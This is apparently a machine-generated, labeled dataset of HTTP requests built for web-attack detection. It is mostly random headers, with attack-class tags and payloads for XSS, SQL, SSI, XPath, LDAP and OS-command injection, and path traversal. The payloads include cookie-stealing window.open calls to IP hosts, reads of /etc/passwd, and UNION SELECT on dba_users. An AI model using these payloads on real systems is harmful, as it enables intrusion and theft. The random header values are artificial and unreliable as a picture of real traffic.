Cookie: odshhisdio5=5xlQqQ;snz=zohprlmgehh;;Sa2acds8dtlotsb=satmys;8fwem=mb7eEi4dtbduQpfeti;ft5dltprg1adA=ts;sbpgxtllwtfcd=ehmyye ynswemg 0-r
Cookie2: $Version="134"
Date: Tue, 31 Aug 04 17:54:57 UTC
ETag: "R5X6Mr66Uc_-mrSq2"
Expect: 100-continue
From: 8eae@aimsslc7.net
If-Modified-Since: Sat, 01 May 10 14:27:56 CET
If-Unmodified-Since: Sun, 31 Jul 05 24:20:45 GMT
If-Match: "TIvclBse10CwPioieO"
If-None-Match: *
If-Range: "6kNai0wxdgBmfbZ"
Max-Forwards: 6
MIME-Version: 2.3
Pragma: no-cache
Proxy-Authorization: NTLM ZWVlT2luN25CbmdyZmFla3JsbDF0YXkzZ3Rpa2xmbW4=
Authorization: ojo1 2ea21rtw=lubthm
Range: 882861-05
Referer: http://nvraH8h.gov/i4irta/ctaNk4j/uitaonb/5yaydbO/htueto.php4
TE: trailers
Trailer: Upgrade
User-Agent: Mozilla/5.7 (compatible; Konqueror/2.0; Mac OS X; iuf2aZlas; ihe1de; hustlts1e)
UA-CPU: Sparc
UA-Disp: 8058,0040,16
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 323x892
Via: HTTP/4.9 www.t7IsaWuQ.html, 0.3 www.dta9.tiff
Transfer-Encoding: gzip
Upgrade: egf/1.1, bses/7.3
Warning: 767 136.91.228.117 "ogadceLeitGounodog" 
X-Forwarded-For: 27.160.160.90
X-Serial-Number: 280200406213
----: -------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 42286
Start - Id: 37895
class: LdapInjection
GET /uDZG3.4s/IWm1telnetoraccess_logFnc5/sO48k46aN8zJKa5UDa3u/amYfwaxusrdi/6onee8aret4dafnlf/bcsLldrhdHrrat/iQX94b3gqDoGtqaBC4q/sv.GCMS8.k/mtH.js?i58tntpsC=%29+++%28++%7C++%28Kmn%3Dad*%29 HTTP/1.1
Host: www.rttsseocsn.be
Connection: close
Accept: */*
Accept-Charset: x-mac-greek;q=0.4
Accept-Encoding: 
Accept-Language: e-uShrtyol;q=0.6, A-ertHo, f1-9acotng;q=0.0, eed-era;q=0.1, Mmar9v-sx;q=0.8
Cache-Control: iteelW='g0orp'
Client-ip: 244.98.54.134
Cookie: 5s=ipassthru;6BS_position@rBL-dropT=tw\r5nq;swO-V=l2Ssr;BmwhereRyGlE3ZP=283
Cookie2: $Version="1"
Date: Sat, 05 May 07 11:16:44 CET
ETag: W/"k_eK26HPsis_XTtOs"
Expect: 4UHf=yc9Ggg;iOlgaObr=Elden
From: pyeere9e@rgid7rnosp.be
If-Modified-Since: Wed, 25 Nov 09 08:45:54 CET
If-Unmodified-Since: Fri, 04 Feb 05 14:47:05 UTC
If-Match: *
If-None-Match: *
If-Range: "D8gVXltb-kNMToSx2"
Max-Forwards: 9
MIME-Version: 1.5
Pragma: no-cache
Proxy-Authorization: Digest realm
Authorization: viol wsolm=aeyhuO
Range: -375,281-
Referer: /vruswai/lmwqiajx.css
TE: chunked;q=0.3,deflate,trailers
Trailer: User-Agent
User-Agent: n6h6shwsDet7erte
UA-CPU: Sparc
UA-Disp: 472,2226,8
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 649x451
Via: 4.1 www.9len.shtml:058, 6.7 121.38.160.197
Transfer-Encoding: gzip
Upgrade: coid/6.4, u7a/5.9, ltuf/8.7, 7Shik/8.1, mtto/2.2
Warning: 960 www.tzoEs.tiff "dlespebn" "Wed, 09 Aug 06 04:59:18 CET"
X-Forwarded-For: 146.237.137.95
X-Serial-Number: 9686105266248523
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 37895
Start - Id: 48151
class: XSS
GET /5evxitnoo3fei.tiff?ase=nwget%7Cclrh1extermiShE+%27n&WfpFD=ntqrae&EdWTBBFS8Zac=hnv&UsHy=nb&GKarf=iestntnamwY%25%3FG&kbs=%26rta0ig+&-5Vwindow.openPB-=%3C%21%5BCDATA%5B%3C%21--%5D%5D+++%3E%3Cscript+++%3E%5Bwindow.open%28%27http%3A%2F%2F41.155.113.171%2Faten.jsp%27%2Bdocument.cookie%29%3B%5D%2F%2F--%3E%3C%2Fscript+%3E&prffwTsint=82248314&QBF9SvA-kO3=sDM HTTP/1.0
Host: www.gq1rn.uk
Connection: Gwt8eld
Accept: */*;q=0.0
Accept-Charset: windows-874
Accept-Encoding: identity, identity;q=0.9, identity;q=0.4
Accept-Language: diet-ctthu;q=0.0, w-7aiet;q=0.3, s5Ieh9s-trfihh, w8DG7r-rcitbi;q=0.5, tdohouyi-lU;q=0.7
Cache-Control: no-store
Cookie2: $Version="4"
Date: Sat, 01 Oct 05 05:39:07 GMT
ETag: W/"VEmXtl7s15oFGnIxna"
Expect: 100-continue
From: ri3oektx@agekwucEtP.ch
If-Unmodified-Since: Wed, 29 Aug 07 03:27:19 CET
If-Match: "H1RdAYLo-D@-p5FgUF_B"
If-None-Match: *
If-Range: Fri, 16 Jan 09 17:29:27 UTC
Max-Forwards: 6074
MIME-Version: 8.3
Pragma: Iptahe='erhtjei'
Authorization: do6Us iepi=0stn1
Range: 248-
Referer: /pxarwe/nN4reedd/hzoe/ttentr.jpeg
TE: trailers,trailers,chunked;q=0.3
Trailer: If-Modified-Since
User-Agent: eoh8cCl_. http://www.lfji.uk
UA-Disp: 187,5451,16
UA-Color: color8
Via: HTTP/4.9 243.11.165.161
Transfer-Encoding: identity
Warning: 475 102.30.177.38 "vrpNbaaNaa2ir" "Mon, 08 Dec 08 15:45:59 UTC"
----: -----------

null

End - Id: 48151
Start - Id: 46672
class: XSS
GET /tplonrtUnhv3TeaNsh/o6dr6hconrlineethan/zf4ICdYIc2J4/s7o96d/seDwt7hNuPR/x6e4Cnye/scriptbJunionagroup byE6/S0sraPp4eDosCadruf/elcZz.sKXnwwGPX/rkWIordzNC/h@zw8JhQsEF17_1cUR.tiff?ezea=78014&OiOs7f0hau=eY5RNy3V&enh2ac=1880&Guitd=e4FiTdb8lDg&ty4rjLjsyctiLpo=yi%27+&igSnhntwdypgr=jw&sdaase9=Bo3&o1rdrgmaetEanci=l&9eiEyduloreo8tE=Il%3D&mcMB=group+by&sBTaD.=sioehtgen%3Ax&bnze1frnuusl=Lwspwsa6h&dEo=270468594&g3tt=TIaad HTTP/1.1
Host: 29.9.55.233
Connection: close
Accept: */*;q=0.7
Accept-Charset: macintosh, windows-1254
Accept-Encoding: deflate;q=0.4, deflate;q=0.9
Accept-Language: t-to9;q=0.9, viS-atst6iW;q=0.9, as-HIsd5nym, t-ZtraNht6;q=0.8
Cache-Control: min-fresh=7
Client-ip: 39.185.229.252
Cookie: iidrOtoo=<link    rel   =  "     stylesheet       "  href=    "    javascript:  [window.open('http://210.9.175.60/maes.aspx'+document.cookie);]      " >
Cookie2: $Version="684"
Date: Sat, 10 Jul 04 02:47:01 UTC
ETag: W/"aS4ysHDtPjTBs0ZI8i"
Expect: 100-continue
From: ocwyd@ratoi.ch
If-Modified-Since: Mon, 11 Jul 05 15:47:12 CET
If-Unmodified-Since: Sat, 10 Apr 10 17:31:36 UTC
If-Match: "BEcC10pZ7PeYIrlSBe_"
If-None-Match: *
If-Range: Wed, 31 May 06 20:45:59 GMT
Max-Forwards: 6160
MIME-Version: 0.9
Pragma: hea='nezuee'
Proxy-Authorization: Digest qop=mdf79hds
Authorization: Basic MmVwem1iOmhyY3Robw==
Range: 1-744161,4-8,7763-187
Referer: http://www.hecdn.net/soi19k/xumntka.asp
TE: trailers,trailers,chunked;q=0.9
Trailer: Referer
User-Agent: Mozilla/7.9 (Windows; U; Win 9x 9.7; tR-ta; rv:8.6.0) Gecko/22641540
UA-CPU: x86
UA-Disp: 598,1386,32
UA-OS: Win98
UA-Color: color8
UA-Pixels: 630x4242
Via: 6.0 147.61.176.4, 5.2 214.255.87.185
Transfer-Encoding: compress
Upgrade: iswm/3.5, nos/4.9, nnhOe/3.4, ranwsn/5.0, tsdq/2.7
Warning: 208 www.u7iqtia.jpg "lnKMot8lqelretdXina" "Sat, 17 Apr 10 13:53:16 GMT"
X-Forwarded-For: 138.128.17.43
X-Serial-Number: 19077842196498
----: -----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 46672
Start - Id: 43647
class: OsCommanding
POST /cV69vKSxzQ67/RtcBnX1/0eimf8dsrrh/tbhmt/oD-j/dtipeiouzdg/1MdOBU/mwM69KOj/giXnwOdRGXtIDBZ/dXUB@/ixmlosLqWbetweeng/Leaailn9e4o.css? HTTP/1.0
Content-Length: 188
Content-Language: ueec,tntEhkeb
Content-Encoding: gzip
Content-Location: http://nsneebe.de/Iaihyo/nodEc.doc
Content-MD5: aXRma3RvYWV0MGF5cG5iaQ==
Content-Type: application/x-www-form-urlencoded
Expires: Thu, 06 Aug 09 08:36:32 GMT
Last-Modified: Mon, 14 Jul 08 19:43:02 CET
Host: 10.106.183.73
Connection: close
Accept: application/x-tar;q=0.2, image/png;q=0.4
Accept-Charset: *
Accept-Encoding: compress
Accept-Language: Ar-asc, llotCltt-s, eaorEls-as5t, 3re-oe1uors
Cache-Control: aettyfl='sez'
Client-ip: 238.47.154.149
Cookie: mlrttea3tg=eyZM9.cr6sB;otcanhhog=|/bin/cat     /etc/passwd%00.html
Date: Thu, 21 Aug 08 07:13:37 CET
ETag: W/"CHO7yd1KwFfpWY63TO"
Expect: 100-continue
From: uynqp@oeR6.fr
If-Modified-Since: Mon, 16 Feb 04 09:40:05 GMT
If-Unmodified-Since: Sat, 05 Dec 09 02:42:43 UTC
If-Match: "MW-EYNhIs110kIQ.kdou"
If-None-Match: "skoQdXhkrFwa8Ef-USF"
If-Range: Tue, 25 Jul 06 11:03:52 GMT
Max-Forwards: 33
Pragma: wihen='tztjoa'
Proxy-Authorization: Basic dHRzbjpsZWNjMGRrZQ==
Authorization: NTLM dDZhNGFzYTZlc2Rzd05lRWFFYWpvOWhFbmxmdnllczVycmVsbnMzeXdhdGF0ZXRl
Range: 369021-347868,-05
Referer: /nprniye/3eam/ptydehr.wav
TE: deflate,trailers
User-Agent: Mozilla/7.7 (X11; U; Linux i586 1.6; ie-io; rv:6.0.2) Gecko/76408681
UA-Pixels: 624x924
Via: HTTP/1.3 144.126.78.9, rdle/7.2 www.eAhle.html, roap/1.1 161.226.176.0
Transfer-Encoding: imtu
Upgrade: etnnf/1.0
X-Serial-Number: 2952019795733002

ABunKwp-ulm=Echl&wfge=xOx&EwgetlKp=2rimgm ?meb2el9hs&ail8k=146&shcEkgnanivlnri=Scmagts&ne6nas=lMXoBi&lshpwye7gnoeEr=e2&earth=1544989832&22_yxUL=392&Di6Wii=q5P-CNnm-&sDiAtAetmomr=~httpD

End - Id: 43647
Start - Id: 42764
class: SqlInjection
POST /dtesie9flUrV8Sikk5/FVws2PUx/s72wH/65b/rCZR3pqr4OU57qzJS/a-NC2T@JeybmVT3Q/se4reqafEiog/we6sdcpm7atultnn/g_OZA17uti/mKV6_/tI@Swp.FGV9z_ujZ/oAocnphntus9EmWb.exe? HTTP/1.1
Content-Length: 108
Content-Language: es5rsoAn,Nno,tei
Content-Encoding: deflate
Content-Location: http://saunsa.fr/csfi/hlrqBIa.html
Content-MD5: ZVR1MjZrZWVZdG5nbWh4Tg==
Content-Type: application/x-www-form-urlencoded
Expires: Sun, 05 Oct 08 04:08:06 UTC
Last-Modified: Sat, 06 Sep 08 24:30:25 UTC
Host: www.fggrEu0.net:79135
Connection: tFm6
Accept: */*;q=0.9
Accept-Charset: iso-8859-9;q=0.1
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-cache
Client-ip: 246.238.255.192
Cookie: S6ydle='    union  select   @@version,1,1,1--
Cookie2: $Version="54"
Date: Tue, 18 Mar 08 20:12:42 UTC
ETag: W/"4syG_ceHAAG5p1m.jr"
Expect: 100-continue
From: asaztlEi@eh4te.de
If-Modified-Since: Thu, 22 Sep 05 24:01:45 CET
If-Unmodified-Since: Sat, 25 Jul 09 12:12:30 UTC
If-Match: *
If-None-Match: *
If-Range: Wed, 07 May 08 04:07:20 CET
Max-Forwards: 7197
Pragma: no-cache
Authorization: Digest nc=6D97D35f
Referer: /stie/hOTeo/elikfas/3l3o/n8Txd4p.tiff
TE: chunked,gzip;q=0.4,deflate;q=0.9
User-Agent: lrel0tLrx7 (obKFuW; t6OU3F.9)
UA-Disp: 110,8354,16
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 648x107
Via: 5.5 www.Fe8h.shtml, FTP/2.0 www.ceehfS.png
Transfer-Encoding: identity
Upgrade: Hic/2.5, elet/9.7
Warning: 191 www.mbisc.gif "soxseOi" 

f6sepfqntohsmin=9013874&aJllr=k0ram\mu&bo=gam&illav=OfC2cttlnB&v8psreryoump=m6xod&sFri=24&3.9M=aen0odxRceo

End - Id: 42764
Start - Id: 40920
class: SSI
GET /rv/lbneNRshoeteeKetumao/eoh0.jpg?sattntrlddTis=%3C%21--+%23odbc+connect%3D%22pibh%2Claady%2C1aono%22++++statement%3D%22select+*++++from+++++imus%22--%3E HTTP/1.1
Host: www.dpeuN.be
Connection: keep-alive
Accept: */*
Accept-Charset: iso-8859-1;q=0.0
Accept-Encoding: *;q=0.9
Accept-Language: *
Cache-Control: no-cache
Client-ip: 164.186.250.7
Cookie: ihleAeef=h5WjyVFoBhgA;nsrivr45s=742;osrp6=c9X_L0;hcevkfqttvmsita=e;mMirom7ijt=ipnhnMdrpxijnc
Cookie2: $Version="15"
Date: Sat, 19 Aug 06 05:52:48 CET
ETag: "4DOTsaKeuKe20mWmkYac"
Expect: 100-continue
From: tmenra3@rdaoespvt.it
If-Modified-Since: Wed, 30 Sep 09 23:19:52 UTC
If-Unmodified-Since: Sun, 27 Dec 09 16:12:54 GMT
If-Match: "rClyl73aN7PzelI3"
If-None-Match: *
If-Range: *
Max-Forwards: 0
MIME-Version: 9.9
Pragma: oiWU9='C7lk'
Proxy-Authorization: Digest qop=auth-int
Authorization: NTLM aWZiaDZzRWVmbzBldHg0YmNla3d0dGUybmVpb3locDRpZndvcg==
Range: 333780-330
Referer: http://salth.st/ocomdA8r/eowts1A/tkbsc.msf
TE: trailers,trailers
Trailer: Accept-Encoding
User-Agent: gn9nTJ/6.9.5
UA-CPU: PowerPC
UA-Disp: 613,8082,8
UA-OS: Win98
UA-Color: color16
Via: 3.4 www.o3aeo7p.css
Transfer-Encoding: identity
Upgrade: na9drT/1.1, snTe/6.0, a9j/2.3, ipdean/7.0, eDed/6.9
Warning: 086 61.20.174.151 "hej5T2phoa6l2adseC1t" 
X-Forwarded-For: 60.122.216.106
X-Serial-Number: 163741114628927
----: ----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 40920
Start - Id: 49061
class: XPathInjection
GET /aleIwly5gRVcuuJ_B5_F/one/t@/tte7Dt8hBxLyueB.exe?ZXTMUkQxY4G=h5tS%7C7t&menl2uaaIbn8b=6743961&assrellhGhahd=oTMN%27+++++or++oenc%2Felus%2Fchild%3A%3Anode%28%29%5Bprocessing-instruction%28%29%3D1%5D+++or+++++%27a8EkypE9%27%3D%27 HTTP/1.0
Host: www.sd3s.st
Connection: sjee7
Accept: text/*;q=0.3, text/*;q=0.8, audio/basic
Accept-Charset: iso-2022-jp;q=0.2
Accept-Encoding: deflate, compress, compress, compress;q=0.5
Accept-Language: Agp-snda, trsf-Crn, itdsr-e;q=0.9
Cache-Control: max-age=53402
Client-ip: 164.173.183.167
Cookie: Hredrgndox=68;ntottHrtrlm=17
Cookie2: $Version="84"
Date: Mon, 22 Mar 10 05:46:13 UTC
ETag: W/"bj@Q8.9F_UsS-HtPu"
Expect: I3umu=lic0is
From: oT4sie@pMej.gov
If-Modified-Since: Mon, 15 Jun 09 07:21:39 CET
If-Unmodified-Since: Sun, 04 Apr 10 15:25:35 UTC
If-Match: *
If-None-Match: "tVEDm1DEek3CZXbowu"
If-Range: "8WcuBMDm2pIipGgVD"
Max-Forwards: 55
MIME-Version: 0.7
Pragma: nd=7zo
Proxy-Authorization: NTLM Y3FhZWFobWFmYW5BaGRlZHRlb3Jhc2xhZTluR2xEdmxkVWNuaEl0ZW92cw==
Authorization: Basic bXIxdHJuOm9zcGE2
Range: -4,-1070,-459610
Referer: http://www.afahs.uk/atrle/tfzkhg/7twsMemn/ldmq3cbu.jsp
TE: chunked,deflate;q=0.8
Trailer: User-Agent
User-Agent: fawrna6t8trMcetcll
UA-CPU: x86
UA-Disp: 470,303,8
UA-OS: Win98
UA-Color: color16
UA-Pixels: 7313x7197
Via: HTTP/5.8 www.srpoanr.css, FTP/9.7 174.224.157.210:69912, 5.6 www.ash3ta.html
Transfer-Encoding: identity
Upgrade: BzRA/3.7, eSa/6.4, DCeds/5.7
Warning: 712 141.86.56.222 "RenNkwhed" "Fri, 05 Oct 07 19:54:02 GMT"
X-Forwarded-For: 161.22.54.66
X-Serial-Number: 00114
----: -----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49061
Start - Id: 42057
class: SqlInjection
GET /rZm6DnBq/hat6igo5iaaeKhe4a9/6Bjc/fromselectHFkYB7.shtml?e5=32&mfn7mja=nuiabN%27+++UNION++%2F**%2F+SELECT+tds76yra+++++FROM++dba_users+++++WHERE+++++tg5+++like+%27%2525&hciRfOisat=emH0Ysq%40yNDl HTTP/1.1
Host: 144.211.13.172
Connection: keep-alive
Accept: */*
Accept-Charset: iso-2022-kr;q=0.1, ks_c_5601-1987, x-mac-turkish
Accept-Encoding: deflate;q=0.5, identity, deflate, gzip, compress;q=0.7
Accept-Language: *;q=0.0
Cache-Control: uete=vNtahvio
Client-ip: 240.50.140.120
Cookie: otbencaaoren7=aeritaolht0etc;h;tinjrhwsbm1l5t=raeSeH;s2aeo32g=gwScbreorvonnaopzs;ElFiePeb=Iho~efrom4Feunapi\t$cle;TOefnnhh5mkt0=oe6i
Cookie2: $Version="46"
Date: Wed, 08 Jun 05 01:53:35 GMT
ETag: "zWjqHOL2ecS3XXB"
Expect: 100-continue
From: lhrrhh9j@48Flats.biz
If-Modified-Since: Fri, 05 Jan 07 07:27:18 GMT
If-Unmodified-Since: Tue, 12 Feb 08 24:31:24 UTC
If-Match: *
If-None-Match: *
If-Range: "w5RYOz85gXktcR8g"
Max-Forwards: 3
MIME-Version: 0.9
Pragma: no-cache
Proxy-Authorization: Basic Y3N0dGR0YTpwZUV0
Authorization: ocsnt noTwatl2=rae2sMHo
Range: -99729
Referer: http://edtOer0.fr/unlhja/nwdw/cdtorsk/nano.php
TE: gzip,chunked;q=0.4,trailers
Trailer: Range
User-Agent: Mozilla/9.8 (X11; U; Open BSD i386 5.3; 0o-nz; rv:2.1.0) Gecko/40989132
UA-CPU: MIPS
UA-Disp: 7502,392,16
UA-OS: Solaris
UA-Color: color8
UA-Pixels: 927x5675
Via: HTTP/2.5 www.ptEisn.tiff, HTTP/3.3 www.azetiae.js, 2.2 17.149.96.178:21521
Transfer-Encoding: tut2ei; aehnijo=uir4h
Upgrade: Ens/2.7, ieoa/3.9, 4tt/2.8, ind/4.0, sute/1.0
Warning: 264 99.10.30.250 "a0gtsj1ecytcw5Eqrc" 
X-Forwarded-For: 206.224.167.230
X-Serial-Number: 001394948859071824
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~

null

End - Id: 42057
Start - Id: 40262
class: SSI
GET /wYK-ao9GCQ_p453j/WJvDqK0-U.-g/icny26mi/eJzppey.obN8i-nsCM/a1yprihseea841k/rGPB0Z6F3nv8@/ac5eNBte7ZO/lg0OnwJs87iM/dlF/hxtermS/wiekYy4atpeph/tfnb_fyIf.css?1XvSA0window.openeTwprocessing-instructiongroup by=91473288&b3nB5UX=no%29vevalinputettD&I4YGYTo5=i%7C+hena%22%22uihtsuaonk&i7ciiiesii=53e&asndqdEeeaIu=1Kk&xidrCdauomweAn=090&K6CK2rIq=alI6et7tqptwr&or5r6O=%3C%21--++%23exec+cmd%3D%22c%3A%5Cprogra%7E1%5CeMot%5Criichtha%5Casdk6.exe+d%3A%5Cv8yepotvo7%5Cwww.oris.org%5Cendg%5Cdatabase.mdb+++%2Fx+++exporttofoxpro%22--%3E&Whl5saHxj=7d&mt4h=e+npeyunullet&yidadanft=oDN-6WEmze&0etngws7aik9s=3EVWzb5xfLp&YDl@Iw59Yy5v=odropel&3tusroth=aoteO HTTP/1.0
Host: 123.65.56.233
Connection: atrNe2bl
Accept: */*
Accept-Charset: *;q=0.9
Accept-Encoding: deflate, compress;q=0.4, gzip;q=0.3, gzip;q=0.9
Accept-Language: *
Cache-Control: no-transform
Client-ip: 140.72.125.191
Cookie: 7ehPeognOanh=46;7ta=36179;Qtil3Tcntvr=45317375;tiaxha=lw
Cookie2: $Version="0"
Date: Sun, 02 Apr 06 09:56:49 GMT
ETag: W/"B6wSrN4YjC3rpPVq"
Expect: 100-continue
From: 7Aiet@9het.it
If-Modified-Since: Mon, 05 Oct 09 12:12:32 GMT
If-Match: "vOraq-ZC0Z3ZDqLATW"
If-None-Match: "al9Ci8aqrUkjFeBH"
If-Range: "k.oJpyJwB8LKHzn"
Max-Forwards: 62
Pragma: no-cache
Authorization: Basic Z1RvaWRtczY6b3NsZQ==
Referer: http://eoeyutn.it/it2etan.php4
TE: trailers,trailers
Trailer: Authorization
User-Agent: Mozilla/2.4 (Windows; U; Windows NT 7.9; no-vn; rv:8.6.0) Gecko/51165691
UA-CPU: MIPS
Transfer-Encoding: gzip
Upgrade: zebo/3.9
Warning: 071 204.81.227.195 "9otlof6hSoleearo2N" 
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 40262
Start - Id: 47752
class: XSS
GET /sock_streamToKEYg4lJLYu4k/irf1eeqhnrda1wis/eXAzcsG-cixU/nMRUBdY7_FO5Qra/etweaokt/d0TiW75I/eqK.WrawgD4/0kuj.exe?22=ucnkh&DlyTnfst9mwxtn=services1usr+oAn0dat&1Z6-97E=b+guvmc&tepo=%3Clink+rel+%3D%22+++++stylesheet+++%22+++href++++%3D++++%22+javascript%3A+%5Bwindow.open%28%27http%3A%2F%2F230.253.119.117%2Finli.jsp%27%2Bdocument.cookie%29%3B%5D+++++%22++++%3E&ehhThtaUe9l=6&ofjig=60475&soaAeurje4e=8943790&atagadohardJ=rfrtySydindMtx HTTP/1.0
Host: www.teeoT.it:39
Connection: keep-alive
Accept: video/*;q=0.3, application/*
Accept-Charset: euc-cn
Accept-Encoding: 
Accept-Language: ig-o;q=0.0, tmejl-Imudoe;q=0.5, proideo-xao8e49s;q=0.3, rbd-elk5on5
Cache-Control: no-cache
Client-ip: 244.205.136.111
Cookie: eerbneUse=)asse7union2m
Cookie2: $Version="00"
Date: Fri, 14 Dec 07 24:38:36 GMT
ETag: W/"sPg8XQuBd1fbCE95qfIX"
Expect: 100-continue
From: timd@onRl.biz
If-Modified-Since: Tue, 29 Jun 04 16:36:17 UTC
If-Unmodified-Since: Fri, 16 Dec 05 05:05:06 GMT
If-Match: *
If-None-Match: *
If-Range: "sXi0VIwrNJbZ3mBaI8e"
Max-Forwards: 638
MIME-Version: 7.7
Pragma: be='oyoey'
Proxy-Authorization: Basic b3Q3YXlzZm06ZHZjaG5m
Authorization: NTLM dzZycGVud09kMnR1dHJ1THQxbnFzZHN1d2dyc2VuZUhpYWs=
Range: -887125,6715-3229
Referer: http://kdlwtggc.ch/eeem0tew.msf
TE: gzip
Trailer: Date
User-Agent: Mozilla/3.4 (Machintosh; U; PPC 2.3; go-3v; rv:2.8.9) Gecko/39959763
UA-CPU: 68000
UA-Disp: 746,0945,16
UA-OS: Win98
UA-Color: color32
UA-Pixels: 561x6609
Via: 9.3 www.Emda.js
Transfer-Encoding: oett
Upgrade: sji/4.0, asq/5.9, arzh/5.3
Warning: 609 250.116.52.92 "hoEd" "Sun, 12 Dec 04 17:54:14 GMT"
X-Forwarded-For: 198.120.124.208
X-Serial-Number: 75850540029155
----: ----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47752
Start - Id: 39700
class: SSI
GET /8aCnulla8K1opt/oOq4D/NQgWkc/dcd/ox3d_ycXfILQ4pDV4hC/rz-ziO@eZeV-_EP-C7Hc/v_Qm@Rkr4Ulsy1lKi/hW6Vr5z8o.oX/onR2cTwUegly12arsEs/eCmz-J6f2ZcgF.cfm?uRP8o0TeSu=8352714&k6pcopy6=sIzZ._GI0&e76eivtray7=%3C%21--+%23include+++++virtual%3D%22%2Fvar%2Flog%2Fhttpd%2Faccess.log%22++++--%3E&aeoherea=i1Vd HTTP/1.1
Host: www.leenI.fr:873
Connection: keep-alive
Accept: application/*, text/plain, application/postscript;q=0.1
Accept-Charset: *;q=0.5
Accept-Encoding: identity, deflate, deflate, gzip;q=0.4, gzip
Accept-Language: sNvsocq-a;q=0.1
Cache-Control: no-cache
Client-ip: 120.48.93.141
Cookie: no=654908815;jGaicCem=636;nwecHuSnseavai=aL5XhG0jT7i-;2hep3tN=71715132;uwg0vEDssrded=763437;bJnmgc9= id
Cookie2: $Version="4"
Date: Sat, 06 Mar 04 15:55:54 UTC
ETag: W/"xkPYfz.4VPY.xSX"
Expect: 100-continue
From: ekb7rls@onnByehnb.gov
If-Modified-Since: Sun, 04 May 08 01:39:28 UTC
If-Unmodified-Since: Fri, 30 Nov 07 02:59:55 CET
If-Match: *
If-None-Match: "sYVsR1Vg2hW.vmfi445"
If-Range: Sun, 20 Aug 06 02:45:23 UTC
Max-Forwards: 1
MIME-Version: 9.9
Pragma: no-cache
Proxy-Authorization: mE1df gdtrmo=oh1esyls
Authorization: Basic cm5mYWVPYW86bmdlbA==
Range: 557783-681,980106-
Referer: http://www.wsoe.gov/tL3cs/6Nbh81/a5hehed3/tutsrEo/t1orenh.mpg
TE: deflate;q=0.4,deflate
Trailer: If-Match
User-Agent: o@gZC1ls http://www.3oaeerc.uk
UA-CPU: Sparc
UA-Disp: 0266,938,16
UA-OS: Win98
UA-Color: color8
UA-Pixels: 726x074
Via: HTTP/5.2 112.213.126.132:122, Aecwe/5.7 5.217.236.76, 9.2 www.MEaiimT.jpg
Transfer-Encoding: compress
Upgrade: im0/0.0, gln/3.7
Warning: 081 www.8wna8.jpg:64 "othhe5UTHRpeH" "Tue, 13 Jun 06 09:06:37 CET"
X-Forwarded-For: 166.133.168.205
X-Serial-Number: 9911764547155
----: ----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 39700
Start - Id: 45833
class: PathTransversal
GET /tMmbl23EWfdF/4sM4Pb9styleXD3ts/bK/oJ5Atchjl/t74hE_9/trGrntw/elao/hMyX5mu9RW/cHiRT/yuFOPuNAH2.png?jt=846612&uncs1lmeVihcj1o=MaxxlhU89iolo&thla=90832526&5ueeooseivo=%5Cautoexec.bat&samHthnpmr8ts=4550 HTTP/1.1
Host: www.r2yr.biz
Connection: sudu
Accept: audio/*
Accept-Charset: iso-8859-7, x-mac-greek;q=0.8
Accept-Encoding: *;q=0.6
Accept-Language: *
Cache-Control: no-transform
Client-ip: 56.249.214.170
Cookie: tstnfn8z=9991;aadmemTionhnca=eThzVKov;lengnte=sgH3
Cookie2: $Version="9"
Date: Mon, 30 Jun 08 14:09:39 CET
ETag: W/"s1@MrC7fOnRr82y"
Expect: tons32
From: ix4abcph@mnt9ssu.gov
If-Modified-Since: Sun, 06 Aug 06 08:42:43 UTC
If-Unmodified-Since: Sat, 26 May 07 01:41:56 GMT
If-Match: *
If-None-Match: *
If-Range: Sun, 04 Apr 10 13:33:34 CET
Max-Forwards: 9
MIME-Version: 9.7
Pragma: tV='Yrdti'
Proxy-Authorization: Digest uri=http://www.ncrl8sh.ch/2nled.asp
Authorization: Basic b3llM2loamk6dGUzb3Rhcw==
Range: -885841
Referer: /on7ie/aSahcg1e.nsf
TE: gzip;q=0.0,deflate;q=0.8,gzip;q=0.3
Trailer: Transfer-Encoding
User-Agent: Mozilla/5.1 (X11; U; Linux i386 2.8; ye-bi; rv:6.5.5) Gecko/88601844
UA-CPU: StrongARM
UA-Color: color8
UA-Pixels: 861x425
Via: 9.8 245.231.3.126, 7.5 www.asb3t.jpg:55428
Transfer-Encoding: compress
Upgrade: idie/5.7, dunk/6.1, sib/2.4
Warning: 945 4.66.74.136 "n7nhehqedexmd" "Sat, 22 Aug 09 11:03:47 GMT"
X-Serial-Number: 25397478987579
----: --------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 45833
Start - Id: 42917
class: OsCommanding
GET /wlnnoOm1l7ema.gif?eqt9etonleo=psnTi HTTP/1.0
Host: www.tlla.net:123
Connection: atnsecd
Accept: */*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: /perl /tmp/erdedeas.pl    -p8575
Cache-Control: no-cache
Client-ip: 216.204.56.99
Cookie: IXGaPoIbdx=2y.S1S;3moei= iframegcf;KB3K6O4A3Gb=l3FHUQ5Eon;tlrnutelotyt=7eme;tttnrvHeNy=r75UbI
Cookie2: $Version="35"
Date: Tue, 23 Mar 10 12:59:27 GMT
ETag: W/"j_xMG_CpbOwHthHE"
Expect: 100-continue
If-Modified-Since: Tue, 10 Feb 09 06:46:32 UTC
If-Unmodified-Since: Tue, 24 Oct 06 17:10:48 CET
If-Match: "egwlNH@JjxVbFnFOZN"
If-None-Match: *
If-Range: Mon, 09 Nov 09 12:49:17 GMT
Max-Forwards: 3
MIME-Version: 7.1
Pragma: no-cache
Proxy-Authorization: Digest realm
Authorization: a4dL haem4n=0she
Range: 761836-
